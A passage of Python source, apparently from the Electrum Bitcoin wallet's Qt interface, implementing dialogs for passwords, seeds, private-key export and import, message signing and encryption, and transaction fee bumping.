self.show_error(repr(e))
return
old_password = hw_dev_pw if self.wallet.has_password() else None
new_password = hw_dev_pw if encrypt_file else None
else:
from .password_dialog import ChangePasswordDialogForSW
d = ChangePasswordDialogForSW(self, self.wallet)
ok, old_password, new_password, encrypt_file = d.run()
if not ok:
return
try:
self.wallet.update_password(old_password, new_password, encrypt_storage=encrypt_file)
except InvalidPassword as e:
self.show_error(str(e))
return
except BaseException:
self.logger.exception('Failed to update password')
self.show_error(_('Failed to update password'))
return
msg = _('Password was updated successfully') if self.wallet.has_password() else _('Password is disabled, this wallet is not protected')
self.show_message(msg, title=_("Success"))
self.update_lock_icon()
def toggle_search(self):
self.search_box.setHidden(not self.search_box.isHidden())
if not self.search_box.isHidden():
self.search_box.setFocus(1)
else:
self.do_search('')
def do_search(self, t):
tab = self.tabs.currentWidget()
if hasattr(tab, 'searchable_list'):
tab.searchable_list.filter(t)
def new_contact_dialog(self):
d = WindowModalDialog(self, _("New Contact"))
vbox = QVBoxLayout(d)
vbox.addWidget(QLabel(_('New Contact') + ':'))
grid = QGridLayout()
line1 = QLineEdit()
line1.setFixedWidth(32 * char_width_in_lineedit())
line2 = QLineEdit()
line2.setFixedWidth(32 * char_width_in_lineedit())
grid.addWidget(QLabel(_("Address")), 1, 0)
grid.addWidget(line1, 1, 1)
grid.addWidget(QLabel(_("Name")), 2, 0)
grid.addWidget(line2, 2, 1)
vbox.addLayout(grid)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if d.exec_():
self.set_contact(line2.text(), line1.text())
def show_wallet_info(self):
dialog = WindowModalDialog(self, _("Wallet Information"))
dialog.setMinimumSize(500, 100)
vbox = QVBoxLayout()
wallet_type = self.wallet.db.get('wallet_type', '')
if self.wallet.is_watching_only():
wallet_type += ' [{}]'.format(_('watching-only'))
seed_available = _('True') if self.wallet.has_seed() else _('False')
keystore_types = [k.get_type_text() for k in self.wallet.get_keystores()]
grid = QGridLayout()
basename = os.path.basename(self.wallet.storage.path)
grid.addWidget(QLabel(_("Wallet name")+ ':'), 0, 0)
grid.addWidget(QLabel(basename), 0, 1)
grid.addWidget(QLabel(_("Wallet type")+ ':'), 1, 0)
grid.addWidget(QLabel(wallet_type), 1, 1)
grid.addWidget(QLabel(_("Script type")+ ':'), 2, 0)
grid.addWidget(QLabel(self.wallet.txin_type), 2, 1)
grid.addWidget(QLabel(_("Seed available") + ':'), 3, 0)
grid.addWidget(QLabel(str(seed_available)), 3, 1)
if len(keystore_types) <= 1:
grid.addWidget(QLabel(_("Keystore type") + ':'), 4, 0)
ks_type = str(keystore_types[0]) if keystore_types else _('No keystore')
grid.addWidget(QLabel(ks_type), 4, 1)
# lightning
grid.addWidget(QLabel(_('Lightning') + ':'), 5, 0)
if self.wallet.can_have_lightning():
grid.addWidget(QLabel(_('Enabled')), 5, 1)
local_nodeid = QLabel(bh2u(self.wallet.lnworker.node_keypair.pubkey))
local_nodeid.setTextInteractionFlags(Qt.TextSelectableByMouse)
grid.addWidget(QLabel(_('Lightning Node ID:')), 6, 0)
grid.addWidget(local_nodeid, 6, 1, 1, 3)
else:
grid.addWidget(QLabel(_("Not available for this wallet.")), 5, 1)
grid.addWidget(HelpButton(_("Lightning is currently restricted to HD wallets with p2wpkh addresses.")), 5, 2)
vbox.addLayout(grid)
labels_clayout = None
if self.wallet.is_deterministic():
keystores = self.wallet.get_keystores()
ks_stack = QStackedWidget()
def select_ks(index):
ks_stack.setCurrentIndex(index)
# only show the combobox in case multiple accounts are available
if len(keystores) > 1:
def label(idx, ks):
if isinstance(self.wallet, Multisig_Wallet) and hasattr(ks, 'label'):
return _("cosigner") + f' {idx+1}: {ks.get_type_text()} {ks.label}'
else:
return _("keystore") + f' {idx+1}'
labels = [label(idx, ks) for idx, ks in enumerate(self.wallet.get_keystores())]
on_click = lambda clayout: select_ks(clayout.selected_index())
labels_clayout = ChoicesLayout(_("Select keystore"), labels, on_click)
vbox.addLayout(labels_clayout.layout())
for ks in keystores:
ks_w = QWidget()
ks_vbox = QVBoxLayout()
ks_vbox.setContentsMargins(0, 0, 0, 0)
ks_w.setLayout(ks_vbox)
mpk_text = ShowQRTextEdit(ks.get_master_public_key())
mpk_text.setMaximumHeight(150)
mpk_text.addCopyButton(self.app)
run_hook('show_xpub_button', mpk_text, ks)
der_path_hbox = QHBoxLayout()
der_path_hbox.setContentsMargins(0, 0, 0, 0)
der_path_hbox.addWidget(QLabel(_("Derivation path") + ':'))
der_path_text = QLabel(ks.get_derivation_prefix() or _("unknown"))
der_path_text.setTextInteractionFlags(Qt.TextSelectableByMouse)
der_path_hbox.addWidget(der_path_text)
der_path_hbox.addStretch()
ks_vbox.addWidget(QLabel(_("Master Public Key")))
ks_vbox.addWidget(mpk_text)
ks_vbox.addLayout(der_path_hbox)
ks_stack.addWidget(ks_w)
select_ks(0)
vbox.addWidget(ks_stack)
vbox.addStretch(1)
btn_export_info = run_hook('wallet_info_buttons', self, dialog)
btn_close = CloseButton(dialog)
btns = Buttons(btn_export_info, btn_close)
vbox.addLayout(btns)
dialog.setLayout(vbox)
dialog.exec_()
def remove_wallet(self):
if self.question('\n'.join([
_('Delete wallet file?'),
"%s"%self.wallet.storage.path,
_('If your wallet contains funds, make sure you have saved its seed.')])):
self._delete_wallet()
@protected
def _delete_wallet(self, password):
wallet_path = self.wallet.storage.path
basename = os.path.basename(wallet_path)
r = self.gui_object.daemon.delete_wallet(wallet_path)
self.close()
if r:
self.show_error(_("Wallet removed: {}").format(basename))
else:
self.show_error(_("Wallet file not found: {}").format(basename))
@protected
def show_seed_dialog(self, password):
if not self.wallet.has_seed():
self.show_message(_('This wallet has no seed'))
return
keystore = self.wallet.get_keystore()
try:
seed = keystore.get_seed(password)
passphrase = keystore.get_passphrase(password)
except BaseException as e:
self.show_error(repr(e))
return
from .seed_dialog import SeedDialog
d = SeedDialog(self, seed, passphrase)
d.exec_()
def show_qrcode(self, data, title = _("QR code"), parent=None, *,
help_text=None, show_copy_text_btn=False):
if not data:
return
d = QRDialog(data, parent or self, title, help_text=help_text,
show_copy_text_btn=show_copy_text_btn)
d.exec_()
@protected
def show_private_key(self, address, password):
if not address:
return
try:
pk = self.wallet.export_private_key(address, password)
except Exception as e:
self.logger.exception('')
self.show_message(repr(e))
return
xtype = bitcoin.deserialize_privkey(pk)[0]
d = WindowModalDialog(self, _("Private key"))
d.setMinimumSize(600, 150)
vbox = QVBoxLayout()
vbox.addWidget(QLabel(_("Address") + ': ' + address))
vbox.addWidget(QLabel(_("Script type") + ': ' + xtype))
vbox.addWidget(QLabel(_("Private key") + ':'))
keys_e = ShowQRTextEdit(text=pk)
keys_e.addCopyButton(self.app)
vbox.addWidget(keys_e)
# if redeem_script:
# vbox.addWidget(QLabel(_("Redeem Script") + ':'))
# rds_e = ShowQRTextEdit(text=redeem_script)
# rds_e.addCopyButton(self.app)
# vbox.addWidget(rds_e)
vbox.addLayout(Buttons(CloseButton(d)))
d.setLayout(vbox)
d.exec_()
msg_sign = _("Signing with an address actually means signing with the corresponding "
"private key, and verifying with the corresponding public key. The "
"address you have entered does not have a unique public key, so these "
"operations cannot be performed.") + '\n\n' + \
_('The operation is undefined. Not just in Electrum, but in general.')
@protected
def do_sign(self, address, message, signature, password):
address = address.text().strip()
message = message.toPlainText().strip()
if not bitcoin.is_address(address):
self.show_message(_('Invalid Bitcoin address.'))
return
if self.wallet.is_watching_only():
self.show_message(_('This is a watching-only wallet.'))
return
if not self.wallet.is_mine(address):
self.show_message(_('Address not in wallet.'))
return
txin_type = self.wallet.get_txin_type(address)
if txin_type not in ['p2pkh', 'p2wpkh', 'p2wpkh-p2sh']:
self.show_message(_('Cannot sign messages with this type of address:') + \
' ' + txin_type + '\n\n' + self.msg_sign)
return
task = partial(self.wallet.sign_message, address, message, password)
def show_signed_message(sig):
try:
signature.setText(base64.b64encode(sig).decode('ascii'))
except RuntimeError:
# (signature) wrapped C/C++ object has been deleted
pass
self.wallet.thread.add(task, on_success=show_signed_message)
def do_verify(self, address, message, signature):
address = address.text().strip()
message = message.toPlainText().strip().encode('utf-8')
if not bitcoin.is_address(address):
self.show_message(_('Invalid Bitcoin address.'))
return
try:
# This can throw on invalid base64
sig = base64.b64decode(str(signature.toPlainText()))
verified = ecc.verify_message_with_address(address, sig, message)
except Exception as e:
verified = False
if verified:
self.show_message(_("Signature verified"))
else:
self.show_error(_("Wrong signature"))
def sign_verify_message(self, address=''):
d = WindowModalDialog(self, _('Sign/verify Message'))
d.setMinimumSize(610, 290)
layout = QGridLayout(d)
message_e = QTextEdit()
message_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Message')), 1, 0)
layout.addWidget(message_e, 1, 1)
layout.setRowStretch(2,3)
address_e = QLineEdit()
address_e.setText(address)
layout.addWidget(QLabel(_('Address')), 2, 0)
layout.addWidget(address_e, 2, 1)
signature_e = QTextEdit()
signature_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Signature')), 3, 0)
layout.addWidget(signature_e, 3, 1)
layout.setRowStretch(3,1)
hbox = QHBoxLayout()
b = QPushButton(_("Sign"))
b.clicked.connect(lambda: self.do_sign(address_e, message_e, signature_e))
hbox.addWidget(b)
b = QPushButton(_("Verify"))
b.clicked.connect(lambda: self.do_verify(address_e, message_e, signature_e))
hbox.addWidget(b)
b = QPushButton(_("Close"))
b.clicked.connect(d.accept)
hbox.addWidget(b)
layout.addLayout(hbox, 4, 1)
d.exec_()
@protected
def do_decrypt(self, message_e, pubkey_e, encrypted_e, password):
if self.wallet.is_watching_only():
self.show_message(_('This is a watching-only wallet.'))
return
cyphertext = encrypted_e.toPlainText()
task = partial(self.wallet.decrypt_message, pubkey_e.text(), cyphertext, password)
def setText(text):
try:
message_e.setText(text.decode('utf-8'))
except RuntimeError:
# (message_e) wrapped C/C++ object has been deleted
pass
self.wallet.thread.add(task, on_success=setText)
def do_encrypt(self, message_e, pubkey_e, encrypted_e):
message = message_e.toPlainText()
message = message.encode('utf-8')
try:
public_key = ecc.ECPubkey(bfh(pubkey_e.text()))
except BaseException as e:
self.logger.exception('Invalid Public key')
self.show_warning(_('Invalid Public key'))
return
encrypted = public_key.encrypt_message(message)
encrypted_e.setText(encrypted.decode('ascii'))
def encrypt_message(self, address=''):
d = WindowModalDialog(self, _('Encrypt/decrypt Message'))
d.setMinimumSize(610, 490)
layout = QGridLayout(d)
message_e = QTextEdit()
message_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Message')), 1, 0)
layout.addWidget(message_e, 1, 1)
layout.setRowStretch(2,3)
pubkey_e = QLineEdit()
if address:
pubkey = self.wallet.get_public_key(address)
pubkey_e.setText(pubkey)
layout.addWidget(QLabel(_('Public key')), 2, 0)
layout.addWidget(pubkey_e, 2, 1)
encrypted_e = QTextEdit()
encrypted_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Encrypted')), 3, 0)
layout.addWidget(encrypted_e, 3, 1)
layout.setRowStretch(3,1)
hbox = QHBoxLayout()
b = QPushButton(_("Encrypt"))
b.clicked.connect(lambda: self.do_encrypt(message_e, pubkey_e, encrypted_e))
hbox.addWidget(b)
b = QPushButton(_("Decrypt"))
b.clicked.connect(lambda: self.do_decrypt(message_e, pubkey_e, encrypted_e))
hbox.addWidget(b)
b = QPushButton(_("Close"))
b.clicked.connect(d.accept)
hbox.addWidget(b)
layout.addLayout(hbox, 4, 1)
d.exec_()
def password_dialog(self, msg=None, parent=None):
from .password_dialog import PasswordDialog
parent = parent or self
d = PasswordDialog(parent, msg)
return d.run()
def tx_from_text(self, data: Union[str, bytes]) -> Union[None, 'PartialTransaction', 'Transaction']:
from electrum.transaction import tx_from_any
try:
return tx_from_any(data)
except BaseException as e:
self.show_critical(_("Electrum was unable to parse your transaction") + ":\n" + repr(e))
return
def import_channel_backup(self, encrypted: str):
if not self.question('Import channel backup?'):
return
try:
self.wallet.lnbackups.import_channel_backup(encrypted)
except Exception as e:
self.show_error("failed to import backup" + '\n' + str(e))
return
def read_tx_from_qrcode(self):
from electrum import qrscanner
try:
data = qrscanner.scan_barcode(self.config.get_video_device())
except BaseException as e:
self.show_error(repr(e))
return
if not data:
return
# if the user scanned a bitcoin URI
if str(data).startswith("bitcoin:"):
self.pay_to_URI(data)
return
if data.startswith('channel_backup:'):
self.import_channel_backup(data)
return
# else if the user scanned an offline signed tx
tx = self.tx_from_text(data)
if not tx:
return
self.show_transaction(tx)
def read_tx_from_file(self) -> Optional[Transaction]:
fileName = self.getOpenFileName(_("Select your transaction file"),
TRANSACTION_FILE_EXTENSION_FILTER_ANY)
if not fileName:
return
try:
with open(fileName, "rb") as f:
file_content = f.read() # type: Union[str, bytes]
except (ValueError, IOError, os.error) as reason:
self.show_critical(_("Electrum was unable to open your transaction file") + "\n" + str(reason),
title=_("Unable to read file or no transaction found"))
return
return self.tx_from_text(file_content)
def do_process_from_text(self):
text = text_dialog(self, _('Input raw transaction'), _("Transaction:"), _("Load transaction"))
if not text:
return
tx = self.tx_from_text(text)
if tx:
self.show_transaction(tx)
def do_process_from_text_channel_backup(self):
text = text_dialog(self, _('Input channel backup'), _("Channel Backup:"), _("Load backup"))
if not text:
return
if text.startswith('channel_backup:'):
self.import_channel_backup(text)
def do_process_from_file(self):
tx = self.read_tx_from_file()
if tx:
self.show_transaction(tx)
def do_process_from_txid(self):
from electrum import transaction
txid, ok = QInputDialog.getText(self, _('Lookup transaction'), _('Transaction ID') + ':')
if ok and txid:
txid = str(txid).strip()
try:
raw_tx = self.network.run_from_another_thread(
self.network.get_transaction(txid, timeout=10))
except UntrustedServerReturnedError as e:
self.logger.info(f"Error getting transaction from network: {repr(e)}")
self.show_message(_("Error getting transaction from network") + ":\n" + e.get_message_for_gui())
return
except Exception as e:
self.show_message(_("Error getting transaction from network") + ":\n" + repr(e))
return
else:
tx = transaction.Transaction(raw_tx)
self.show_transaction(tx)
@protected
def export_privkeys_dialog(self, password):
if self.wallet.is_watching_only():
self.show_message(_("This is a watching-only wallet"))
return
if isinstance(self.wallet, Multisig_Wallet):
self.show_message(_('WARNING: This is a multi-signature wallet.') + '\n' +
_('It cannot be "backed up" by simply exporting these private keys.'))
d = WindowModalDialog(self, _('Private keys'))
d.setMinimumSize(980, 300)
vbox = QVBoxLayout(d)
msg = "%s\n%s\n%s" % (_("WARNING: ALL your private keys are secret."),
_("Exposing a single private key can compromise your entire wallet!"),
_("In particular, DO NOT use 'redeem private key' services proposed by third parties."))
vbox.addWidget(QLabel(msg))
e = QTextEdit()
e.setReadOnly(True)
vbox.addWidget(e)
defaultname = 'electrum-private-keys.csv'
select_msg = _('Select file to export your private keys to')
hbox, filename_e, csv_button = filename_field(self, self.config, defaultname, select_msg)
vbox.addLayout(hbox)
b = OkButton(d, _('Export'))
b.setEnabled(False)
vbox.addLayout(Buttons(CancelButton(d), b))
private_keys = {}
addresses = self.wallet.get_addresses()
done = False
cancelled = False
def privkeys_thread():
for addr in addresses:
time.sleep(0.1)
if done or cancelled:
break
privkey = self.wallet.export_private_key(addr, password)
private_keys[addr] = privkey
self.computing_privkeys_signal.emit()
if not cancelled:
self.computing_privkeys_signal.disconnect()
self.show_privkeys_signal.emit()
def show_privkeys():
s = "\n".join( map( lambda x: x[0] + "\t"+ x[1], private_keys.items()))
e.setText(s)
b.setEnabled(True)
self.show_privkeys_signal.disconnect()
nonlocal done
done = True
def on_dialog_closed(*args):
nonlocal done
nonlocal cancelled
if not done:
cancelled = True
self.computing_privkeys_signal.disconnect()
self.show_privkeys_signal.disconnect()
self.computing_privkeys_signal.connect(lambda: e.setText("Please wait... %d/%d"%(len(private_keys),len(addresses))))
self.show_privkeys_signal.connect(show_privkeys)
d.finished.connect(on_dialog_closed)
threading.Thread(target=privkeys_thread).start()
if not d.exec_():
done = True
return
filename = filename_e.text()
if not filename:
return
try:
self.do_export_privkeys(filename, private_keys, csv_button.isChecked())
except (IOError, os.error) as reason:
txt = "\n".join([
_("Electrum was unable to produce a private key-export."),
str(reason)
])
self.show_critical(txt, title=_("Unable to create csv"))
except Exception as e:
self.show_message(repr(e))
return
self.show_message(_("Private keys exported."))
def do_export_privkeys(self, fileName, pklist, is_csv):
with open(fileName, "w+") as f:
os.chmod(fileName, 0o600)
if is_csv:
transaction = csv.writer(f)
transaction.writerow(["address", "private_key"])
for addr, pk in pklist.items():
transaction.writerow(["%34s"%addr,pk])
else:
f.write(json.dumps(pklist, indent = 4))
def do_import_labels(self):
def on_import():
self.need_update.set()
import_meta_gui(self, _('labels'), self.wallet.import_labels, on_import)
def do_export_labels(self):
export_meta_gui(self, _('labels'), self.wallet.export_labels)
def import_invoices(self):
import_meta_gui(self, _('invoices'), self.wallet.import_invoices, self.invoice_list.update)
def export_invoices(self):
export_meta_gui(self, _('invoices'), self.wallet.export_invoices)
def import_requests(self):
import_meta_gui(self, _('requests'), self.wallet.import_requests, self.request_list.update)
def export_requests(self):
export_meta_gui(self, _('requests'), self.wallet.export_requests)
def import_contacts(self):
import_meta_gui(self, _('contacts'), self.contacts.import_file, self.contact_list.update)
def export_contacts(self):
export_meta_gui(self, _('contacts'), self.contacts.export_file)
def sweep_key_dialog(self):
d = WindowModalDialog(self, title=_('Sweep private keys'))
d.setMinimumSize(600, 300)
vbox = QVBoxLayout(d)
hbox_top = QHBoxLayout()
hbox_top.addWidget(QLabel(_("Enter private keys:")))
hbox_top.addWidget(InfoButton(WIF_HELP_TEXT), alignment=Qt.AlignRight)
vbox.addLayout(hbox_top)
keys_e = ScanQRTextEdit(allow_multi=True)
keys_e.setTabChangesFocus(True)
vbox.addWidget(keys_e)
addresses = self.wallet.get_unused_addresses()
if not addresses:
try:
addresses = self.wallet.get_receiving_addresses()
except AttributeError:
addresses = self.wallet.get_addresses()
h, address_e = address_field(addresses)
vbox.addLayout(h)
vbox.addStretch(1)
button = OkButton(d, _('Sweep'))
vbox.addLayout(Buttons(CancelButton(d), button))
button.setEnabled(False)
def get_address():
addr = str(address_e.text()).strip()
if bitcoin.is_address(addr):
return addr
def get_pk(*, raise_on_error=False):
text = str(keys_e.toPlainText())
return keystore.get_private_keys(text, raise_on_error=raise_on_error)
def on_edit():
valid_privkeys = False
try:
valid_privkeys = get_pk(raise_on_error=True) is not None
except Exception as e:
button.setToolTip(f'{_("Error")}: {repr(e)}')
else:
button.setToolTip('')
button.setEnabled(get_address() is not None and valid_privkeys)
on_address = lambda text: address_e.setStyleSheet((ColorScheme.DEFAULT if get_address() else ColorScheme.RED).as_stylesheet())
keys_e.textChanged.connect(on_edit)
address_e.textChanged.connect(on_edit)
address_e.textChanged.connect(on_address)
on_address(str(address_e.text()))
if not d.exec_():
return
# user pressed "sweep"
addr = get_address()
try:
self.wallet.check_address_for_corruption(addr)
except InternalAddressCorruption as e:
self.show_error(str(e))
raise
privkeys = get_pk()
def on_success(result):
coins, keypairs = result
outputs = [PartialTxOutput.from_address_and_value(addr, value='!')]
self.warn_if_watching_only()
self.pay_onchain_dialog(coins, outputs, external_keypairs=keypairs)
def on_failure(exc_info):
self.on_error(exc_info)
msg = _('Preparing sweep transaction...')
task = lambda: self.network.run_from_another_thread(
sweep_preparations(privkeys, self.network))
WaitingDialog(self, msg, task, on_success, on_failure)
def _do_import(self, title, header_layout, func):
text = text_dialog(self, title, header_layout, _('Import'), allow_multi=True)
if not text:
return
keys = str(text).split()
good_inputs, bad_inputs = func(keys)
if good_inputs:
msg = '\n'.join(good_inputs[:10])
if len(good_inputs) > 10: msg += '\n...'
self.show_message(_("The following addresses were added")
+ f' ({len(good_inputs)}):\n' + msg)
if bad_inputs:
msg = "\n".join(f"{key[:10]}... ({msg})" for key, msg in bad_inputs[:10])
if len(bad_inputs) > 10: msg += '\n...'
self.show_error(_("The following inputs could not be imported")
+ f' ({len(bad_inputs)}):\n' + msg)
self.address_list.update()
self.history_list.update()
def import_addresses(self):
if not self.wallet.can_import_address():
return
title, msg = _('Import addresses'), _("Enter addresses")+':'
self._do_import(title, msg, self.wallet.import_addresses)
@protected
def do_import_privkey(self, password):
if not self.wallet.can_import_privkey():
return
title = _('Import private keys')
header_layout = QHBoxLayout()
header_layout.addWidget(QLabel(_("Enter private keys")+':'))
header_layout.addWidget(InfoButton(WIF_HELP_TEXT), alignment=Qt.AlignRight)
self._do_import(title, header_layout, lambda x: self.wallet.import_private_keys(x, password))
def update_fiat(self):
b = self.fx and self.fx.is_enabled()
self.fiat_send_e.setVisible(b)
self.fiat_receive_e.setVisible(b)
self.history_list.update()
self.address_list.refresh_headers()
self.address_list.update()
self.update_status()
def settings_dialog(self):
from .settings_dialog import SettingsDialog
d = SettingsDialog(self, self.config)
self.alias_received_signal.connect(d.set_alias_color)
d.exec_()
self.alias_received_signal.disconnect(d.set_alias_color)
if self.fx:
self.fx.trigger_update()
run_hook('close_settings_dialog')
if d.need_restart:
self.show_warning(_('Please restart Electrum to activate the new GUI settings'), title=_('Success'))
def closeEvent(self, event):
# It seems in some rare cases this closeEvent() is called twice
if not self.cleaned_up:
self.cleaned_up = True
self.clean_up()
event.accept()
def clean_up(self):
self.wallet.thread.stop()
util.unregister_callback(self.on_network)
self.config.set_key("is_maximized", self.isMaximized())
if not self.isMaximized():
g = self.geometry()
self.wallet.db.put("winpos-qt", [g.left(),g.top(),
g.width(),g.height()])
self.wallet.db.put("qt-console-history", self.console.history[-50:])
if self.qr_window:
self.qr_window.close()
self.close_wallet()
self.gui_object.timer.timeout.disconnect(self.timer_actions)
self.gui_object.close_window(self)
def plugins_dialog(self):
self.pluginsdialog = d = WindowModalDialog(self, _('Electrum Plugins'))
plugins = self.gui_object.plugins
vbox = QVBoxLayout(d)
# plugins
scroll = QScrollArea()
scroll.setEnabled(True)
scroll.setWidgetResizable(True)
scroll.setMinimumSize(400,250)
vbox.addWidget(scroll)
w = QWidget()
scroll.setWidget(w)
w.setMinimumHeight(plugins.count() * 35)
grid = QGridLayout()
grid.setColumnStretch(0,1)
w.setLayout(grid)
settings_widgets = {}
def enable_settings_widget(p: Optional['BasePlugin'], name: str, i: int):
widget = settings_widgets.get(name) # type: Optional[QWidget]
if widget and not p:
# plugin got disabled, rm widget
grid.removeWidget(widget)
widget.setParent(None)
settings_widgets.pop(name)
elif widget is None and p and p.requires_settings() and p.is_enabled():
# plugin got enabled, add widget
widget = settings_widgets[name] = p.settings_widget(d)
grid.addWidget(widget, i, 1)
def do_toggle(cb, name, i):
p = plugins.toggle(name)
cb.setChecked(bool(p))
enable_settings_widget(p, name, i)
# note: all enabled plugins will receive this hook:
run_hook('init_qt', self.gui_object)
for i, descr in enumerate(plugins.descriptions.values()):
full_name = descr['__name__']
prefix, _separator, name = full_name.rpartition('.')
p = plugins.get(name)
if descr.get('registers_keystore'):
continue
try:
cb = QCheckBox(descr['fullname'])
plugin_is_loaded = p is not None
cb_enabled = (not plugin_is_loaded and plugins.is_available(name, self.wallet)
or plugin_is_loaded and p.can_user_disable())
cb.setEnabled(cb_enabled)
cb.setChecked(plugin_is_loaded and p.is_enabled())
grid.addWidget(cb, i, 0)
enable_settings_widget(p, name, i)
cb.clicked.connect(partial(do_toggle, cb, name, i))
msg = descr['description']
if descr.get('requires'):
msg += '\n\n' + _('Requires') + ':\n' + '\n'.join(map(lambda x: x[1], descr.get('requires')))
grid.addWidget(HelpButton(msg), i, 2)
except Exception:
self.logger.exception(f"cannot display plugin {name}")
grid.setRowStretch(len(plugins.descriptions.values()), 1)
vbox.addLayout(Buttons(CloseButton(d)))
d.exec_()
def cpfp(self, parent_tx: Transaction, new_tx: PartialTransaction) -> None:
total_size = parent_tx.estimated_size() + new_tx.estimated_size()
parent_txid = parent_tx.txid()
assert parent_txid
parent_fee = self.wallet.get_tx_fee(parent_txid)
if parent_fee is None:
self.show_error(_("Can't CPFP: unknown fee for parent transaction."))
return
d = WindowModalDialog(self, _('Child Pays for Parent'))
vbox = QVBoxLayout(d)
msg = (
"A CPFP is a transaction that sends an unconfirmed output back to "
"yourself, with a high fee. The goal is to have miners confirm "
"the parent transaction in order to get the fee attached to the "
"child transaction.")
vbox.addWidget(WWLabel(_(msg)))
msg2 = ("The proposed fee is computed using your "
"fee/kB settings, applied to the total size of both child and "
"parent transactions. After you broadcast a CPFP transaction, "
"it is normal to see a new unconfirmed transaction in your history.")
vbox.addWidget(WWLabel(_(msg2)))
grid = QGridLayout()
grid.addWidget(QLabel(_('Total size') + ':'), 0, 0)
grid.addWidget(QLabel('%d bytes'% total_size), 0, 1)
max_fee = new_tx.output_value()
grid.addWidget(QLabel(_('Input amount') + ':'), 1, 0)
grid.addWidget(QLabel(self.format_amount(max_fee) + ' ' + self.base_unit()), 1, 1)
output_amount = QLabel('')
grid.addWidget(QLabel(_('Output amount') + ':'), 2, 0)
grid.addWidget(output_amount, 2, 1)
fee_e = BTCAmountEdit(self.get_decimal_point)
# FIXME with dyn fees, without estimates, there are all kinds of crashes here
combined_fee = QLabel('')
combined_feerate = QLabel('')
def on_fee_edit(x):
fee_for_child = fee_e.get_amount()
if fee_for_child is None:
return
out_amt = max_fee - fee_for_child
out_amt_str = (self.format_amount(out_amt) + ' ' + self.base_unit()) if out_amt else ''
output_amount.setText(out_amt_str)
comb_fee = parent_fee + fee_for_child
comb_fee_str = (self.format_amount(comb_fee) + ' ' + self.base_unit()) if comb_fee else ''
combined_fee.setText(comb_fee_str)
comb_feerate = comb_fee / total_size * 1000
comb_feerate_str = self.format_fee_rate(comb_feerate) if comb_feerate else ''
combined_feerate.setText(comb_feerate_str)
fee_e.textChanged.connect(on_fee_edit)
def get_child_fee_from_total_feerate(fee_per_kb):
fee = fee_per_kb * total_size / 1000 - parent_fee
fee = min(max_fee, fee)
fee = max(total_size, fee) # pay at least 1 sat/byte for combined size
return fee
suggested_feerate = self.config.fee_per_kb()
if suggested_feerate is None:
self.show_error(f'''{_("Can't CPFP'")}: {_('Dynamic fee estimates not available')}''')
return
fee = get_child_fee_from_total_feerate(suggested_feerate)
fee_e.setAmount(fee)
grid.addWidget(QLabel(_('Fee for child') + ':'), 3, 0)
grid.addWidget(fee_e, 3, 1)
def on_rate(dyn, pos, fee_rate):
fee = get_child_fee_from_total_feerate(fee_rate)
fee_e.setAmount(fee)
fee_slider = FeeSlider(self, self.config, on_rate)
fee_combo = FeeComboBox(fee_slider)
fee_slider.update()
grid.addWidget(fee_slider, 4, 1)
grid.addWidget(fee_combo, 4, 2)
grid.addWidget(QLabel(_('Total fee') + ':'), 5, 0)
grid.addWidget(combined_fee, 5, 1)
grid.addWidget(QLabel(_('Total feerate') + ':'), 6, 0)
grid.addWidget(combined_feerate, 6, 1)
vbox.addLayout(grid)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if not d.exec_():
return
fee = fee_e.get_amount()
if fee is None:
return # fee left empty, treat is as "cancel"
if fee > max_fee:
self.show_error(_('Max fee exceeded'))
return
new_tx = self.wallet.cpfp(parent_tx, fee)
new_tx.set_rbf(True)
self.show_transaction(new_tx)
def bump_fee_dialog(self, tx: Transaction):
txid = tx.txid()
assert txid
fee = self.wallet.get_tx_fee(txid)
if fee is None:
self.show_error(_("Can't bump fee: unknown fee for original transaction."))
return
tx_label = self.wallet.get_label_for_txid(txid)
tx_size = tx.estimated_size()
old_fee_rate = fee / tx_size # sat/vbyte
d = WindowModalDialog(self, _('Bump Fee'))
vbox = QVBoxLayout(d)
vbox.addWidget(WWLabel(_("Increase your transaction's fee to improve its position in mempool.")))
grid = QGridLayout()
grid.addWidget(QLabel(_('Current Fee') + ':'), 0, 0)
grid.addWidget(QLabel(self.format_amount(fee) + ' ' + self.base_unit()), 0, 1)
grid.addWidget(QLabel(_('Current Fee rate') + ':'), 1, 0)
grid.addWidget(QLabel(self.format_fee_rate(1000 * old_fee_rate)), 1, 1)
grid.addWidget(QLabel(_('New Fee rate') + ':'), 2, 0)
def on_textedit_rate():
fee_slider.deactivate()
feerate_e = FeerateEdit(lambda: 0)
feerate_e.setAmount(max(old_fee_rate * 1.5, old_fee_rate + 1))
feerate_e.textEdited.connect(on_textedit_rate)
grid.addWidget(feerate_e, 2, 1)
def on_slider_rate(dyn, pos, fee_rate):
fee_slider.activate()
if fee_rate is not None:
feerate_e.setAmount(fee_rate / 1000)
fee_slider = FeeSlider(self, self.config, on_slider_rate)
fee_combo = FeeComboBox(fee_slider)
fee_slider.deactivate()
grid.addWidget(fee_slider, 3, 1)
grid.addWidget(fee_combo, 3, 2)
vbox.addLayout(grid)
cb = QCheckBox(_('Final'))
vbox.addWidget(cb)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if not d.exec_():
return
is_final = cb.isChecked()
new_fee_rate = feerate_e.get_amount()
try:
new_tx = self.wallet.bump_fee(tx=tx, new_fee_rate=new_fee_rate, coins=self.get_coins())
except CannotBumpFee as e:
self.show_error(str(e))
return
if is_final:
new_tx.set_rbf(False)
self.show_transaction(new_tx, tx_desc=tx_label)
def dscancel_dialog(self, tx: Transaction):
txid = tx.txid()
assert txid
fee = self.wallet.get_tx_fee(txid)
if fee is None:
self.show_error(_('Cannot cancel transaction') + ': ' + _('unknown fee for original transaction'))
return
tx_size = tx.estimated_size()
old_fee_rate = fee / tx_size # sat/vbyte
d = WindowModalDialog(self, _('Cancel transaction'))
vbox = QVBoxLayout(d)
vbox.addWidget(WWLabel(_("Cancel an unconfirmed RBF transaction by double-spending "
"its inputs back to your wallet with a higher fee.")))
grid = QGridLayout()
grid.addWidget(QLabel(_('Current Fee') + ':'), 0, 0)
grid.addWidget(QLabel(self.format_amount(fee) + ' ' + self.base_unit()), 0, 1)
grid.addWidget(QLabel(_('Current Fee rate') + ':'), 1, 0)
grid.addWidget(QLabel(self.format_fee_rate(1000 * old_fee_rate)), 1, 1)
grid.addWidget(QLabel(_('New Fee rate') + ':'), 2, 0)
